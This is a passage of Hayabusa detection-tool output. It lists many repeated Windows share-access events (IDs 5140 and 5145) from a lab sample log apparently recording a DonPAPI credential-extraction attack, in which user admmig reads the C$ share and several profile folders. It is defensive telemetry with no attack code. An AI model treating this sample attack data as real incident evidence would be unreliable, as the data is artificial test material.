0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.181 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.181 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.181 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.181 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.181 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.181 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.198 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.218 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.218 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.218 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.218 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.218 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.218 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.249 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.249 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.249 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.249 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.249 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.265 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.268 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.270 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.305 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.306 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.308 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.308 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.323 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.323 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.323 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.323 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.339 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.339 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.339 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.339 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.339 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.339 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 